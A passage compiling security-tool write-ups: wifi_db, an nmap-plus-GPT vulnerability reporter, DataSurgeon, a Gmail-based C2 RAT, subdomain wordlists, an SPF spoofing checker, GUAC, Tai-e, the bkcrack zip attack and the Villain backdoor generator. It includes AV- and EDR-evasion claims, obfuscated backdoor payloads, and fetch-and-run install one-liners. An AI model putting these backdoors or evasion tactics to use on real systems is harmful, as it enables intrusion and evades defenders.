CAPTURESFOLDER=/home/user/wifi

# Output database
touch db.SQLITE

docker run -t -v $PWD/db.SQLITE:/db.SQLITE -v $CAPTURESFOLDER:/captures/ r4ulcl/wifi_db
  • -v $PWD/db.SQLITE:/db.SQLITE: to save the output to the db.SQLITE file in the current folder
  • -v $CAPTURESFOLDER:/captures/: to share the folder with the captures with the Docker container

Create the SQLite database using manual installation

Once the capture is created, we can create the database by importing the capture. To do this, give the name of the capture without the extension.

python3 wifi_db.py scan-01

If we have multiple captures, we can load the folder that contains them directly. And with -d we can rename the output database.

python3 wifi_db.py -d database.sqlite scan-folder

Open database

The database can be opened with any SQLite browser or client.

Below is an example of a ProbeClientsConnected table.

Arguments

usage: wifi_db.py [-h] [-v] [--debug] [-o] [-t LAT] [-n LON] [--source [{aircrack-ng,kismet,wigle}]] [-d DATABASE] capture [capture ...]

positional arguments:
capture capture folder or file with extensions .csv, .kismet.csv, .kismet.netxml, or .log.csv. If no extension is provided, all types will
be added. This option supports the use of wildcards (*) to select multiple files or folders.

options:
-h, --help show this help message and exit
-v, --verbose increase output verbosity
--debug increase output verbosity to debug
-o, --obfuscated Obfuscate MAC and BSSID with AA:BB:CC:XX:XX:XX-defghi (WARNING: replace all database)
-t LAT, --lat LAT insert a fake lat in the new elements
-n LON, --lon LON insert a fake lon in the new elements
--source [{aircrack-ng,kismet,wigle}]
source from capture data (default: aircrack-ng)
-d DATABASE, --database DATABASE
output database, if exist append to the given database (default name: db.SQLITE)

Kismet

TODO

Wigle

TODO

Database

wifi_db contains several tables to store information related to wireless network traffic captured by airodump-ng. The tables are as follows:

  • AP: This table stores information about the access points (APs) detected during the captures, including their MAC address (bssid), network name (ssid), whether the network is cloaked (cloaked), manufacturer (manuf), channel (channel), frequency (frequency), carrier (carrier), encryption type (encryption), and total packets received from this AP (packetsTotal). The table uses the MAC address as a primary key.

  • Client: This table stores information about the wireless clients detected during the captures, including their MAC address (mac), network name (ssid), manufacturer (manuf), device type (type), and total packets received from this client (packetsTotal). The table uses the MAC address as a primary key.

  • SeenClient: This table stores information about the clients seen during the captures, including their MAC address (mac), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt). The table uses the combination of MAC address and detection time as a primary key, and has a foreign key relationship with the Client table.

  • Connected: This table stores information about the wireless clients that are connected to an access point, including the MAC address of the access point (bssid) and the client (mac). The table uses a combination of access point and client MAC addresses as a primary key, and has foreign key relationships with both the AP and Client tables.

  • WPS: This table stores information about access points that have Wi-Fi Protected Setup (WPS) enabled, including their MAC address (bssid), network name (wlan_ssid), WPS version (wps_version), device name (wps_device_name), model name (wps_model_name), model number (wps_model_number), configuration methods (wps_config_methods), and keypad configuration methods (wps_config_methods_keypad). The table uses the MAC address as a primary key, and has a foreign key relationship with the AP table.

  • SeenAp: This table stores information about the access points seen during the captures, including their MAC address (bssid), time of detection (time), tool used to capture the data (tool), signal strength (signal_rssi), latitude (lat), longitude (lon), altitude (alt), and timestamp (bsstimestamp). The table uses the combination of access point MAC address and detection time as a primary key, and has a foreign key relationship with the AP table.

  • Probe: This table stores information about the probes sent by clients, including the client MAC address (mac), network name (ssid), and time of probe (time). The table uses a combination of client MAC address and network name as a primary key, and has a foreign key relationship with the Client table.

  • Handshake: This table stores information about the handshakes captured during the captures, including the MAC address of the access point (bssid), the client (mac), the file name (file), and the hashcat format (hashcat). The table uses a combination of access point and client MAC addresses, and file name as a primary key, and has foreign key relationships with both the AP and Client tables.

  • Identity: This table represents EAP (Extensible Authentication Protocol) identities and methods used in wireless authentication. The bssid and mac fields are foreign keys that reference the AP and Client tables, respectively. Other fields include the identity and method used in the authentication process.

Views

  • ProbeClients: This view selects the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe and Client tables on the MAC address and orders the results by SSID.

  • ConnectedAP: This view selects the BSSID of the connected access point, the SSID of the access point, the MAC address of the connected client device, and the manufacturer of the client device. It joins the Connected, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • ProbeClientsConnected: This view selects the BSSID and SSID of the connected access point, the MAC address of the probe, the manufacturer and type of the client device, the total number of packets transmitted by the client, and the SSID of the probe. It joins the Probe, Client, and ConnectedAP tables on the MAC address of the probe, and filters the results to exclude probes that are connected to the same SSID that they are probing. The results are ordered by the SSID of the probe.

  • HandshakeAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • HandshakeAPUnique: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the handshake, the manufacturer of the client device, the file containing the handshake, and the hashcat output. It joins the Handshake, AP, and Client tables on the BSSID and MAC address, respectively, and filters the results to exclude handshakes that were not cracked by hashcat. The results are grouped by SSID and ordered by BSSID.

  • IdentityAP: This view selects the BSSID of the access point, the SSID of the access point, the MAC address of the client device that performed the identity request, the manufacturer of the client device, the identity string, and the method used for the identity request. It joins the Identity, AP, and Client tables on the BSSID and MAC address, respectively, and orders the results by BSSID.

  • SummaryAP: This view selects the SSID, the count of access points broadcasting the SSID, the encryption type, the manufacturer of the access point, and whether the SSID is cloaked. It groups the results by SSID and orders them by the count of access points in descending order.
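Because everything lands in ordinary SQLite tables and views, post-processing is a short script away. For example, a minimal sketch that dumps the hashcat material via the HandshakeAP view (column names are assumed from the schema description above):

import sqlite3

con = sqlite3.connect("db.SQLITE")
# Column names assumed from the schema description above
rows = con.execute("SELECT bssid, ssid, mac, hashcat FROM HandshakeAP WHERE hashcat != ''")
for bssid, ssid, mac, hashcat in rows:
    print(ssid, bssid, mac)
    print(hashcat)  # 22000-format line, ready for cracking
con.close()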

TODO

  • Aircrack-ng

  • All in 1 file (and separately)

  • Kismet

  • Wigle

  • install

  • parse all files in folder -f --folder

  • Fix Extended errors, tildes, etc (fixed in aircrack-ng 1.6)

  • Support bash multi files: "capture*-1*"

  • Script to delete client or AP from DB (mac). - (Whitelist)

  • Whitelist to avoid adding MACs to the DB (file whitelist.txt, add MACs, create DB)

  • Overwrite if there is new info (old ESSID='', New ESSID='WIFI')

  • Table Handshakes and PMKID

  • Hashcat hash format 22000

  • Table files, if file exists skip (full path)

  • Get HTTP POST passwords

  • DNS queries


This program is a continuation of a part of: https://github.com/T1GR3S/airo-heat

Author

  • RaΓΊl Calvo Laorden (@r4ulcl)

License

GNU General Public License v3.0



GPT_Vuln-analyzer - Uses ChatGPT API And Python-Nmap Module To Use The GPT3 Model To Create Vulnerability Reports Based On Nmap Scan Data


This is a Proof Of Concept application that demonstrates how AI can be used to generate accurate results for vulnerability analysis, while also making further use of the already very useful ChatGPT.

Requirements

  • Python 3.10
  • All the packages mentioned in the requirements.txt file
  • OpenAI API key

Usage

  • First, change the "API__KEY" part of the code to your OpenAI API key
openai.api_key = "__API__KEY" # Enter your API key
  • Second, install the packages:
pip3 install -r requirements.txt
or
pip install -r requirements.txt
  • Run the code: python3 gpt_vuln.py <> (or, on Windows, python gpt_vuln.py <>)

Supported on both Windows and Linux.

Understanding the code

Profiles:

Parameter  Return data  Description            Nmap Command
p1         json         Effective Scan         -Pn -sV -T4 -O -F
p2         json         Simple Scan            -Pn -T4 -A -v
p3         json         Low Power Scan         -Pn -sS -sU -T4 -A -v
p4         json         Partial Intense Scan   -Pn -p- -T4 -A -v
p5         json         Complete Intense Scan  -Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln

The profile is the type of scan that will be executed by the nmap subprocess. The IP or target is provided via argparse. First, the custom nmap scan is run with all the crucial arguments for the scan. Next, the relevant scan data is extracted from the large volume of data produced by nmap: the "scan" object contains sub-data under "tcp", each entry labeled according to the open ports. Once the data is extracted, it is sent to the OpenAI API davinci model via a prompt. The prompt specifically asks for JSON output and for the data to be used in a certain manner.

The entire structure of the request sent to the OpenAI API is defined in the completion section of the program.

# Note: nm (a python-nmap PortScanner) and model_engine are initialized
# elsewhere in the script; see the setup sketch below.
def profile(ip):
    # Run the complete intense scan profile (p5)
    nm.scan('{}'.format(ip), arguments='-Pn -sS -sU -T4 -A -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script=vuln')
    json_data = nm.analyse_nmap_xml_scan()
    analize = json_data["scan"]
    # Prompt describing what the query is all about
    prompt = "do a vulnerability analysis of {} and return a vulnerability report in json".format(analize)
    # A structure for the request
    completion = openai.Completion.create(
        engine=model_engine,
        prompt=prompt,
        max_tokens=1024,
        n=1,
        stop=None,
    )
    response = completion.choices[0].text
    return response
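
For context, here is a minimal sketch of the setup that the function above relies on elsewhere in the script (the engine name and target IP are assumptions; the README only says a davinci model is used):

import nmap
import openai

openai.api_key = "__API__KEY"      # Enter your API key
nm = nmap.PortScanner()            # scanner object used by profile()
model_engine = "text-davinci-003"  # assumption: a davinci-family completion engine

# With profile() defined as above:
# print(profile("192.168.1.10"))   # hypothetical target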

Advantages

  • Can be used to develop more advanced systems built entirely on the API and scanner combination
  • Can increase the effectiveness of the final system
  • Highly productive when working with models such as GPT-3


DataSurgeon - Quickly Extracts IP's, Email Addresses, Hashes, Files, Credit Cards, Social Security Numbers And More From Text


DataSurgeon (ds) is a versatile tool designed for incident response, penetration testing, and CTF challenges. It allows for the extraction of various types of sensitive information including emails, phone numbers, hashes, credit cards, URLs, IP addresses, MAC addresses, SRV DNS records and a lot more!

  • Supports Windows, Linux and MacOS

Extraction Features

  • Emails
  • Files
  • Phone numbers
  • Credit Cards
  • Google API Private Key ID's
  • Social Security Numbers
  • AWS Keys
  • Bitcoin wallets
  • URL's
  • IPv4 Addresses and IPv6 addresses
  • MAC Addresses
  • SRV DNS Records
  • Extract Hashes
    • MD4 & MD5
    • SHA-1, SHA-224, SHA-256, SHA-384, SHA-512
    • SHA-3 224, SHA-3 256, SHA-3 384, SHA-3 512
    • MySQL 323, MySQL 41
    • NTLM
    • bcrypt
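
DataSurgeon itself is written in Rust, but conceptually this kind of extraction is pattern matching; here is a minimal Python sketch of pulling MD5-style and SHA-1-style hex strings out of text (a rough approximation, not ds's actual patterns):

import re

text = "admin:5f4dcc3b5aa765d61d8327deb882cf99 token=da39a3ee5e6b4b0d3255bfef95601890afd80709"
print(re.findall(r"\b[a-fA-F0-9]{32}\b", text))  # MD5-length hex strings
print(re.findall(r"\b[a-fA-F0-9]{40}\b", text))  # SHA-1-length hex strings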

Want more?

Please read the contributing guidelines here

Quick Install

Install Rust and Github

Linux

wget -O - https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | bash

Windows

Enter the line below in an elevated PowerShell window.

IEX (New-Object Net.WebClient).DownloadString("https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.ps1")

Relaunch your terminal and you will be able to use ds from the command line.

Mac

curl --proto '=https' --tlsv1.2 -sSf https://raw.githubusercontent.com/Drew-Alleman/DataSurgeon/main/install/install.sh | sh

Command Line Arguments



Video Guide

Examples

Extracting Files From a Remote Website

Here I use wget to make a request to stackoverflow, then forward the body text to ds. The -F option will list all files found. --clean is used to remove any extra text that might have been returned (such as extra HTML). The result is then piped to uniq, which removes any duplicate files found.

 wget -qO - https://www.stackoverflow.com | ds -F --clean | uniq


Extracting Mac Addresses From an Output File

Here I am pulling all MAC addresses found in autodeauth's log file using the -m query. The --hide option will hide the identifier string in front of the results; in this case 'mac_address: ' is hidden from the output. The -T option is used to check the same line multiple times for matches. Normally, when a match is found, the tool moves on to the next line rather than checking it again.

$ ./ds -m -T --hide -f /var/log/autodeauth/log     
2023-02-26 00:28:19 - Sending 500 deauth frames to network: BC:2E:48:E5:DE:FF -- PrivateNetwork
2023-02-26 00:35:22 - Sending 500 deauth frames to network: 90:58:51:1C:C9:E1 -- TestNet

Reading all files in a directory

The line below will read all files in the current directory recursively. The -D option is used to display the filename (-f is required for the filename to display) and -e is used to search for emails.

$ find . -type f -exec ds -f {} -CDe \;


Speed Tests

When no specific query is provided, ds will search through all possible types of data, which is SIGNIFICANTLY slower than using individual queries. The slowest query is --files. It's also slightly faster to use cat to pipe the data to ds.

Below is the elapsed time when processing a 5GB test file generated by ds-test. Each test was run 3 times and the average time was recorded.

Computer Specs

Processor: Intel(R) Core(TM) i5-10400F CPU @ 2.90GHz, 2904 Mhz, 6 Core(s), 12 Logical Processor(s)
RAM: 12.0 GB (11.9 GB usable)

Searching all data types

Command Speed
cat test.txt | ds -t 00h:02m:04s
ds -t -f test.txt 00h:02m:05s
cat test.txt | ds -t -o output.txt 00h:02m:06s

Using specific queries

Command Speed Query Count
cat test.txt | ds -t -6 00h:00m:12s 1
cat test.txt | ds -t -i -m 00h:00m:22s 2
cat test.txt | ds -tF6c 00h:00m:32s 3

Project Goals

  • JSON and CSV output
  • Untar/unzip and a directory searching mode
  • Base64 Detection and decoding


Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions


 A Fully Undetectable C2 Server That Communicates Via Google SMTP to evade Antivirus Protections 
and Network Traffic Restrictions


Note:

 This RAT communicates via Gmail SMTP (you can use any other SMTP server as well), but Gmail SMTP is a good choice
because most companies block unknown traffic, while Gmail traffic is trusted and allowed almost everywhere.

Warning:

 1. Don't upload any payloads to VirusTotal.com, because this tool will stop working over time.
2. VirusTotal shares signatures with AV companies.
3. Again, don't be an idiot!

How To Setup

 1. Create two separate Gmail accounts.
2. Now enable SMTP on both accounts (check YouTube if you don't know how).
3. Suppose you have already created two separate Gmail accounts with SMTP enabled:
A -> first account represents Your_1st_gmail@gmail.com
B -> 2nd account represents your_2nd_gmail@gmail.com
4. Now Go To server.py file and fill the following at line 67:
smtpserver="smtp.gmail.com" (don't change this)
smtpuser="Your_1st_gmail@gmail.com"
smtpkey="your_1st_gmail_app_password"
imapserver="imap.gmail.com" (don't change this)
imapboy="your_2nd_gmail@gmail.com"
5. Now Go To client.py file and fill the following at line 16:
imapserver = "imap.gmail.com" (don't change this)
username = "your_2nd_gmail@gmail.com"
password = "your2ndgmailapp password"
getting = "Your_1st_gmail@gmail.com"
smtpserver = "smtp.gmail.com" (don't change this)
6. Enjoy

How To Run:-

 *:- For Windows:-
1. Make sure python3 and pip are installed, and the requirements are installed as well.
2. python server.py (on server side)


*:- For Linux:-
1. Make sure all requirements are installed.
2. python3 server.py (on server side)

C2 Feature:-

 1) Persistence (type persist)
2) Shell Access
3) System Info (type info)
4) More Features Will Be Added

Features:-

1) FUD Ratio 0/40
2) Bypass Any EDR Solutions
3) Bypass Any Network Restrictions
4) Commands Are Sent in Base64 And Decoded on the Server Side
5) No More Tcp Shits

Warning:-

Use this tool only for educational purposes. I will not be responsible for your cruel acts.


Probable_Subdomains - Subdomains Analysis And Generation Tool. Reveal The Hidden!


Online tool: https://weakpass.com/generate/domains

TL;DR

During bug bounties, penetration tests, red team exercises, and other great activities, there is always a moment when you need to launch amass, subfinder, sublister, or any other tool to find subdomains you can use to break through - like test.google.com, dev.admin.paypal.com or staging.ceo.twitter.com. Within this repository, you will be able to find the answers to the following questions:

  1. What are the most popular subdomains?
  2. What are the most common words in multilevel subdomains on different levels?
  3. What are the most used words in subdomains?

And, of course, wordlists for all of the questions above!


Methodology

As sources, I used lists of subdomains from public bug bounty programs collected by chaos.projectdiscovery.io and bounty-targets-data, or from programs that just had responsible disclosure programs, for a total of 4095 domains! If a subdomain appears in more than 5-10 different scopes, it is put in a certain list. For example, if dev.stg appears both in *.google.com and *.twitter.com, it will have a frequency of 2. It does not matter how often dev.stg appears in *.google.com. That's all - nothing more, nothing less.
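
The counting logic behind this methodology is straightforward; here is a minimal Python sketch (with toy scope data) that counts in how many distinct scopes each subdomain appears:

from collections import Counter

# Toy example: subdomain prefixes seen per scope
scopes = {
    "google.com": ["dev.stg", "www", "dev.stg", "mail"],
    "twitter.com": ["dev.stg", "api"],
}

freq = Counter()
for scope, subs in scopes.items():
    for sub in set(subs):  # count each subdomain once per scope
        freq[sub] += 1

print(freq["dev.stg"])  # 2 - duplicates within a single scope are ignored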

You can find the complete list of sources here

Lists

Subdomains

In these lists you will find the most popular subdomains as is.

Name Words count Size
subdomains.txt.gz 21901389 501MB
subdomains_top100.txt 100 706B
subdomains_top1000.txt 1000 7.2KB
subdomains_top10000.txt 10000 70KB

Subdomain levels

In these lists, you will find the most popular words from subdomains split by levels. For example, a dev.stg subdomain will be split into two words, dev and stg; dev will have level = 2, stg will have level = 1. You can use these wordlists for combinatory attacks in subdomain searches. There are several types of level.txt wordlists that follow this idea.
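
Here is a minimal sketch of the level-splitting idea (levels are numbered right to left, so in dev.stg the label stg is level 1 and dev is level 2):

def split_levels(subdomain):
    # "dev.stg" -> {1: 'stg', 2: 'dev'}
    labels = subdomain.split(".")
    return {level: label for level, label in enumerate(reversed(labels), start=1)}

print(split_levels("dev.stg"))  # {1: 'stg', 2: 'dev'}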

Name Words count Size
level_1.txt.gz 8096054 153MB
level_2.txt.gz 7556074 106MB
level_3.txt.gz 1490999 18MB
level_4.txt.gz 205969 3.2MB
level_5.txt.gz 71716 849KB
level_1_top100.txt 100 633B
level_1_top1000.txt 1000 6.6K
level_2_top100.txt 100 550B
level_2_top1000.txt 1000 5.6KB
level_3_top100.txt 100 531B
level_3_top1000.txt 1000 5.1KB
level_4_top100.txt 100 525B
level_4_top1000.txt 1000 5.0KB
level_5_top100.txt 100 449B
level_5_top1000.txt 1000 5.0KB

Popular split subdomains

In these lists, you will find the most popular split words from subdomains on all levels. For example, a dev.stg subdomain will be split into two words, dev and stg.

Name Words count Size
words.txt.gz 17229401 278MB
words_top100.txt 100 597B
words_top1000.txt 1000 5.5KB
words_top10000.txt 10000 62KB

Google Drive

You can download all the files from Google Drive

Attributions

Thanks!



Email-Vulnerablity-Checker - Find Email Spoofing Vulnerabilities Of Domains


Verify whether a domain is vulnerable to spoofing with Email-Vulnerablity-Checker

Features

  • This tool will automatically tell you if the domain is email-spoofable or not
  • You can provide a single domain or multiple domains as input (for the multiple-domain check you need a text file with the domains in it; a sketch of the underlying DNS check follows below)
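
The check itself boils down to inspecting the domain's DNS records. Below is a minimal Python sketch of the kind of SPF lookup involved, shelling out to dig just as the script's dependencies suggest; the spoofability heuristic here is a simplification, not the script's exact logic:

import subprocess

def spf_record(domain):
    # Query TXT records and keep the SPF one, if any
    out = subprocess.run(["dig", "+short", "TXT", domain],
                         capture_output=True, text=True).stdout
    for line in out.splitlines():
        if "v=spf1" in line:
            return line.strip().strip('"')
    return ""

record = spf_record("example.com")
# A hard fail ("-all") is the strictest setting; weaker policies may allow spoofing
print(record or "no SPF record found (likely spoofable)")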

Usage:

Clone the package by running:

git clone  https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git

Step 1. Install Requirements

# Update the package list and install dig for Debian-based Linux distribution 
sudo apt update
sudo apt install dnsutils

# Install dig for CentOS
sudo yum install bind-utils

# Install dig for macOS
brew install dig

Step 2. Finish The Installation

To use the Email-Vulnerablity-Checker type the following commands in Terminal:

apt install git -y 
apt install dig -y
git clone https://github.com/BLACK-SCORP10/Email-Vulnerablity-Checker.git
cd Email-Vulnerablity-Checker
chmod 777 spfvuln.sh

Run the email vulnerability checker by just typing:

./spfvuln.sh -h

Support

For Queries: Telegram
Contributions, issues, and feature requests are welcome!
Give a β˜… if you like this project!



GUAC - Aggregates Software Security Metadata Into A High Fidelity Graph Database


Note: GUAC is under active development - if you are interested in contributing, please look at the contributor guide and the "express interest" issue

Graph for Understanding Artifact Composition (GUAC) aggregates software security metadata into a high fidelity graph database, normalizing entity identities and mapping standard relationships between them. Querying this graph can drive higher-level organizational outcomes such as audit, policy, risk management, and even developer assistance.


Conceptually, GUAC occupies the "aggregation and synthesis" layer of the software supply chain transparency logical model:

A few examples of questions answered by GUAC include:

Quickstart

Refer to the Setup + Demo document to learn how to prepare your environment and try GUAC out!

Architecture

Here is an overview of the architecture of GUAC:

Supported input formats

Additional References

Communication

We encourage discussions on GitHub issues. We also have a public Slack channel on the OpenSSF Slack.

For security issues or code of conduct concerns, an e-mail should be sent to guac-maintainers@googlegroups.com.

Governance

Information about governance can be found here.



Tai-e - An Easy-To-Learn/Use Static Analysis Framework For Java


Tai-e

What is Tai-e?

Tai-e (Chinese: ε€ͺ阿; pronunciation: [ˈtaɪə:]) is a new static analysis framework for Java (please see our technical report for details), which features arguably the "best" designs from both the novel ones we proposed and those of classic frameworks such as Soot, WALA, Doop, and SpotBugs. Tai-e is easy to learn, easy to use, efficient, and highly extensible, allowing you to easily develop new analyses on top of it.

Currently, Tai-e provides the following major analysis components (and more analyses are on the way):

  • Powerful pointer analysis framework
    • On-the-fly call graph construction
    • Various classic and advanced techniques of heap abstraction and context sensitivity for pointer analysis
    • Extensible analysis plugin system (allows you to conveniently develop and add new analyses that interact with pointer analysis)
  • Various fundamental/client/utility analyses
    • Fundamental analyses, e.g., reflection analysis and exception analysis
    • Modern language feature analyses, e.g., lambda and method reference analysis, and invokedynamic analysis
    • Clients, e.g., configurable taint analysis (allowing you to configure sources, sinks and taint transfers)
    • Utility tools like analysis timer, constraint checker (for debugging), and various graph dumpers
  • Control/Data-flow analysis framework
    • Control-flow graph construction
    • Classic data-flow analyses, e.g., live variable analysis, constant propagation
    • Your data-flow analyses
  • SpotBugs-like bug detection system
    • Bug detectors, e.g., null pointer detector, incorrect clone() detector
    • Your bug detectors

Tai-e is developed in Java, and it can run on major operating systems including Windows, Linux, and macOS.


How to Obtain Runnable Jar of Tai-e?

The simplest way is to download it from GitHub Releases.

Alternatively, you can build the latest Tai-e yourself from the source code. This can be done simply via Gradle (be sure that Java 17 or a higher version is available on your system). You just need to run the command gradlew fatJar, and the runnable jar will be generated in tai-e/build/, including Tai-e and all its dependencies.

Documentation

We are hosting the documentation of Tai-e on the GitHub wiki, where you can find more information about Tai-e, such as Setup in IntelliJ IDEA, Command-Line Options, and Development of New Analysis.

Tai-e Assignments

In addition, we have developed an educational version of Tai-e where eight programming assignments are carefully designed for systematically training learners to implement various static analysis techniques to analyze real Java programs. The educational version shares a large amount of code with Tai-e, thus doing the assignments would be a good way to get familiar with Tai-e.



Bkcrack - Crack Legacy Zip Encryption With Biham And Kocher's Known Plaintext Attack


Crack legacy zip encryption with Biham and Kocher's known plaintext attack.

Overview

A ZIP archive may contain many entries whose content can be compressed and/or encrypted. In particular, entries can be encrypted with a password-based symmetric encryption algorithm referred to as traditional PKWARE encryption, legacy encryption or ZipCrypto. This algorithm generates a pseudo-random stream of bytes (keystream) which is XORed with the entry's content (plaintext) to produce encrypted data (ciphertext). The generator's state, made of three 32-bit integers, is initialized using the password and then continuously updated with plaintext as encryption goes on. This encryption algorithm is vulnerable to known plaintext attacks, as shown by Eli Biham and Paul C. Kocher in the research paper A known plaintext attack on the PKZIP stream cipher. Given ciphertext and 12 or more bytes of the corresponding plaintext, the internal state of the keystream generator can be recovered. This internal state is enough to decipher the ciphertext entirely, as well as other entries which were encrypted with the same password. It can also be used to bruteforce the password with a complexity of n^(l-6), where n is the size of the character set and l is the length of the password.
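
For reference, here is a minimal Python sketch of the keystream generator described above; the three-key update rule is the classic ZipCrypto scheme, so this is illustrative rather than bkcrack's actual C++ implementation:

import zlib

def crc32_byte(crc, ch):
    # Single-byte CRC-32 table update, as used by ZipCrypto
    return zlib.crc32(bytes([ch]), crc ^ 0xFFFFFFFF) ^ 0xFFFFFFFF

def update_keys(keys, ch):
    k0, k1, k2 = keys
    k0 = crc32_byte(k0, ch)
    k1 = ((k1 + (k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
    k2 = crc32_byte(k2, k1 >> 24)
    return (k0, k1, k2)

def keystream_byte(keys):
    tmp = (keys[2] & 0xFFFF) | 3
    return ((tmp * (tmp ^ 1)) >> 8) & 0xFF

# The state (three 32-bit integers) starts from fixed constants,
# then absorbs the password, then each plaintext byte as encryption goes on.
keys = (0x12345678, 0x23456789, 0x34567890)
for ch in b"password":
    keys = update_keys(keys, ch)
print(hex(keystream_byte(keys)))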

bkcrack is a command-line tool which implements this known plaintext attack. The main features are:

  • Recover internal state from ciphertext and plaintext.
  • Change a ZIP archive's password using the internal state.
  • Recover the original password from the internal state.

Install

Precompiled packages

You can get the latest official release on GitHub.

Precompiled packages for Ubuntu, MacOS and Windows are available for download. Extract the downloaded archive wherever you like.

On Windows, Microsoft runtime libraries are needed for bkcrack to run. If they are not already installed on your system, download and install the latest Microsoft Visual C++ Redistributable package.

Compile from source

Alternatively, you can compile the project with CMake.

First, download the source files or clone the git repository. Then, running the following commands in the source tree will create an installation in the install folder.

cmake -S . -B build -DCMAKE_INSTALL_PREFIX=install
cmake --build build --config Release
cmake --build build --config Release --target install

Third-party packages

bkcrack is available in the package repositories listed on the right. Those packages are provided by external maintainers.

Usage

List entries

You can see a list of entry names and metadata in an archive named archive.zip like this:

bkcrack -L archive.zip

Entries using ZipCrypto encryption are vulnerable to a known-plaintext attack.

Recover internal keys

The attack requires at least 12 bytes of known plaintext. At least 8 of them must be contiguous. The larger the contiguous known plaintext, the faster the attack.

Load data from zip archives

Having a zip archive encrypted.zip with the entry cipher being the ciphertext and plain.zip with the entry plain as the known plaintext, bkcrack can be run like this:

bkcrack -C encrypted.zip -c cipher -P plain.zip -p plain

Load data from files

Having a file cipherfile with the ciphertext (starting with the 12 bytes corresponding to the encryption header) and plainfile with the known plaintext, bkcrack can be run like this:

bkcrack -c cipherfile -p plainfile

Offset

If the plaintext corresponds to a part other than the beginning of the ciphertext, you can specify an offset. It can be negative if the plaintext includes a part of the encryption header.

bkcrack -c cipherfile -p plainfile -o offset

Sparse plaintext

If you know only a small amount of contiguous plaintext (between 8 and 11 bytes), but you know some bytes at other known offsets, you can provide this information to reach the requirement of 12 known bytes in total. To do so, use the -x flag followed by an offset and bytes in hexadecimal.

bkcrack -c cipherfile -p plainfile -x 25 4b4f -x 30 21

Number of threads

If bkcrack was built with parallel mode enabled, the number of threads used can be set through the environment variable OMP_NUM_THREADS.

Decipher

If the attack is successful, the deciphered data associated with the ciphertext used for the attack can be saved:

bkcrack -c cipherfile -p plainfile -d decipheredfile

If the keys are known from a previous attack, it is possible to use bkcrack to decipher data:

bkcrack -c cipherfile -k 12345678 23456789 34567890 -d decipheredfile

Decompress

The deciphered data might be compressed depending on whether compression was used or not when the zip file was created. If deflate compression was used, a Python 3 script provided in the tools folder may be used to decompress data.

python3 tools/inflate.py < decipheredfile > decompressedfile

Unlock encrypted archive

It is also possible to generate a new encrypted archive with the password of your choice:

bkcrack -C encrypted.zip -k 12345678 23456789 34567890 -U unlocked.zip password

The archive generated this way can be extracted using any zip file utility with the new password. It assumes that every entry was originally encrypted with the same password.

Recover password

Given the internal keys, bkcrack can try to find the original password. You can look for a password up to a given length using a given character set:

bkcrack -k 1ded830c 24454157 7213b8c5 -r 10 ?p

You can be more specific by specifying a minimal password length:

bkcrack -k 18f285c6 881f2169 b35d661d -r 11..13 ?p

Learn

A tutorial is provided in the example folder.

For more information, have a look at the documentation and read the source.

Contribute

Do not hesitate to suggest improvements or submit pull requests on GitHub.

License

This project is provided under the terms of the zlib/png license.



Villain - Windows And Linux Backdoor Generator And Multi-Session Handler That Allows Users To Connect With Sibling Servers And Share Their Backdoor Sessions


Villain is a Windows & Linux backdoor generator and multi-session handler that allows users to connect with sibling servers (other machines running Villain) and share their backdoor sessions, handy for working as a team.

The main idea behind the payloads generated by this tool is inherited from HoaxShell. One could say that Villain is an evolved, steroid-induced version of it.

This is an early release currently being tested.
If you are having detection issues, watch this video on how to bypass signature-based detection

Video Presentation

[2022-11-30] Recent & awesome, made by John Hammond -> youtube.com/watch?v=pTUggbSCqA0
[2022-11-14] Original release demo, made by me -> youtube.com/watch?v=NqZEmBsLCvQ

Disclaimer: Running the payloads generated by this tool against hosts that you do not have explicit permission to test is illegal. You are responsible for any trouble you may cause by using this tool.


Installation & Usage

git clone https://github.com/t3l3machus/Villain
cd ./Villain
pip3 install -r requirements.txt

You should run as root:

Villain.py [-h] [-p PORT] [-x HOAX_PORT] [-c CERTFILE] [-k KEYFILE] [-u] [-q]

For more information about using Villain check out the Usage Guide.

Important Notes

  1. Villain has a built-in auto-obfuscate payload function to assist users in bypassing AV solutions (for Windows payloads). As a result, payloads are undetected (for the time being).
  2. Each generated payload is going to work only once. An already used payload cannot be reused to establish a session.
  3. The communication between sibling servers is AES encrypted, using the recipient sibling server's ID as the encryption key and the first 16 bytes of the local server's ID as the IV (see the sketch after this list). During the initial connection handshake of two sibling servers, each server's ID is exchanged in clear text, meaning that the handshake could be captured and used to decrypt traffic between sibling servers. I know it's "weak" that way. It's not supposed to be super secure, as this tool was designed to be used during penetration testing / red team assessments, for which this encryption scheme should be enough.
  4. Villain instances connected with each other (sibling servers) must be able to directly reach each other as well. I intend to add a network route mapping utility so that sibling servers can use one another as a proxy to achieve cross network communication between them.
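
A rough Python sketch of the scheme described in note 3 above, using pycryptodome (the IDs, cipher mode, and padding are assumptions for illustration; the actual details live in Villain's source):

from Crypto.Cipher import AES
from Crypto.Util.Padding import pad

recipient_id = "b64f9a0e2c814d3a9f41c7d2e8a15c33"  # hypothetical sibling server ID
local_id = "7d2ce1a94b0f48d2a6c35e97f1b824aa"      # hypothetical local server ID

key = recipient_id.encode()[:32]  # recipient sibling's ID as the encryption key
iv = local_id.encode()[:16]       # first 16 bytes of the local server's ID as IV

cipher = AES.new(key, AES.MODE_CBC, iv)  # mode is an assumption
ciphertext = cipher.encrypt(pad(b"command output", AES.block_size))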

Approach

A few notes about the http(s) beacon-like reverse shell approach:

Limitations

  • A backdoor shell is going to hang if you execute a command that initiates an interactive session. For more information read this.

Advantages

  • When it comes to Windows, the generated payloads can run even in PowerShell Constrained Language Mode.
